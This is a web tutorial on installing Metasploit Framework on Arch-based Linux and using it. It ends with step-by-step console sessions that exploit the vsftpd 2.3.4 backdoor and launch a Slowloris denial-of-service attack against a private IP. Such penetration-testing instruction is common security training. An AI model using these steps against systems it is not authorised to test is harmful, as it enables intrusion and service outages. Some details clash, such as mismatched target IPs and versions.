Welcome to our tutorial on installing and using Metasploit Framework on Arch | Manjaro | Garuda Linux systems. The MSF acronym Metasploit Framework is one of the most valuable security auditing tools accessible to security experts today, in our opinion. The Metasploit Framework offers a very remarkable work environment, with a large range of commercial quality exploits and a robust exploit creation environment, as well as network information collecting tools and web vulnerability plugins. To scan the system and acquire information, MFS works smoothly with protocols like Nmap, SNMP, Windows patch enumeration, and others since it is a free and open-source framework that can be customized to operate on any OS.
Common use cases of Metasploit Framework
- Metasploit is used to do a SYN scan.
- Exploiting DistCC Daemon Command Execution using Metasploit.
- Metasploit is being used to scan ports.
- Metasploit is being used to launch a denial-of-service attack.
- Hacking an IRC server with Metasploit.
- Hacking an FTP server with Metasploit.
- Metasploit is used to exploit the Samba Usermap Script vulnerability.
Install Metasploit Framework on Arch | Manjaro | Garuda Linux
Let’s have a look at the system requirements for Metasploit before we get started with the installation.
System Requirements
- 2 GHz+processor CPU
- 4 GB RAM (8GB Recommended).
- 1 GB of storage space (50GB Recommended).
- Ruby on Rails.
- Postgresql database.
Metasploit is available as a command-line tool or as a graphical user interface.
Metasploit Framework Interfaces
- Armitage is a third-party program that runs on the Gui platform.
- msfweb is a browser-based interface for MSFS.
- msfconsole is a command-line interface that allows you to communicate with it (widely used)
- msfcli is a command-line interface for Linux.
To install and utilize Metasploit Framework on Arch | Manjaro | Garuda Linux, follow the instructions below.
Step 1: Update system Packages
Before installing, make sure your system packages are up to date. Execute these commands:
sudo pacman -SyuReboot the system:
sudo rebootStep 2: Install Metasploit framework on Arch | Manjaro | Garuda Linux
After the reboot, the next step is to install Metasploit Framework from AUR. Execute the following command:
sudo pacman -S metasploitNow, start the installation process:
resolving dependencies...
looking for conflicting packages...
warning: dependency cycle detected:
warning: rubygems will be installed before its ruby dependency
Package (6) New Version Net Change Download Size
extra/postgresql-libs 17.2-3 8.62 MiB 1.68 MiB
extra/ruby 3.3.7-2 16.19 MiB 3.98 MiB
extra/ruby-bundler 2.6.0-3 1.63 MiB 0.40 MiB
extra/ruby-erb 4.0.4-6 0.10 MiB 0.03 MiB
extra/rubygems 3.5.22-3 2.72 MiB 0.61 MiB
extra/metasploit 6.4.54-1 404.11 MiB 119.59 MiB
Total Download Size: 126.30 MiB
Total Installed Size: 433.36 MiB
:: Proceed with installation? [Y/n] YCreate and initialize the PostgreSQL msf database after the installation is complete.
Follow the Link below to create User and Database in PostgreSQL:
Currently, Metasploit demands that you perform the db_connect command every time you launch msfconsole. In the .msf4 directory, create a database.yml file.
$ mkdir .msf4
$ cd .msf4
$ cat > database.yml
production:
adapter: postgresql
database: msf
username: metauser
password: StrongPa$$w@rd
host: localhost
port: 5432
pool: 5
timeout: 5Use the msfconsole command now that Metasploit is installed.
$ msfconsole
.~+P``````-o+:. -o+:.
.+oooyysyyssyyssyddh++os-````` ``````````````` `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
`...............` `...-/////...`
.::::::::::-. .::::::-
.hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
:Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
.sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
-Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
-Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
`oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
.yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
.shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
`///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
/MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
-hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
.sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================
Press ENTER to size up the situation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to continue
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 > Now connect to the PostgreSQL database:
msf6 > db_connect metauser@msfCheck if your database is connected:
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.Example Usage of Metasploit Framework
We will demonstrate how to utilize MSF to discover and exploit flaws in a system.
Hacking an FTP server with Metasploit
Use Metasploit commands to identify suitable exploits against your target’s security flaws once you’ve found them.
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoorAs you can see, Metasploit has a backdoor that might assist us hack our target FTP. To utilize this exploit, execute the following command in Metasploit:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interactRun the following commands to understand how to utilize a certain exploit:
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 AutomaticRHOSTS (remote host) and RPORT (remote port) are the two choices available in this attack, as seen above. The RHOST must be provided; the port must be supplied as well (21).
To define the destination IP’s Remote Host (RHOST), run:
> set RHOST 192.168.137.78
RHOST => 192.168.137.78To exploit the security flaw, use the following command once the target has been defined:
> exploitTo leave the target just run:
> exitUsing Metasploit to launch a denial-of-service attack
If a DOS slowloris vulnerability is discovered, continue the preceding procedures to identify an appropriate tool, in this instance an accessory module rather than an exploit:
> search slowloris
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/slowloris 2009-06-17 normal No Slowloris Denial of Service Attack
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/dos/http/slowlorisRun: Once we’ve identified a tool to assault with.
> use auxiliary/dos/http/slowlorisSet RHOST:
> set RHOST 192.168.137.78
RHOST => 192.168.137.78Execute run command:
msf6 auxiliary(dos/http/slowloris) > run
[*] Starting server...
[*] Attacking 192.168.137.7 with 150 sockets
[*] Creating sockets...
[*] Sending keep-alive headers... Socket count: 150
[*] Sending keep-alive headers... Socket count: 150
[*] Sending keep-alive headers... Socket count: 150
[*] Sending keep-alive headers... Socket count: 150
[*] Sending keep-alive headers... Socket count: 150
[*] Sending keep-alive headers... Socket count: 150To stop an attack use CTRL+C.
Conclusion
I hope you find this tutorial to getting started with Metasploit Framework on Arch | Manjaro | Garuda Linux helpful. Please let us know if you have any issues in the comments section below. Have fun with it!
Other Guides:
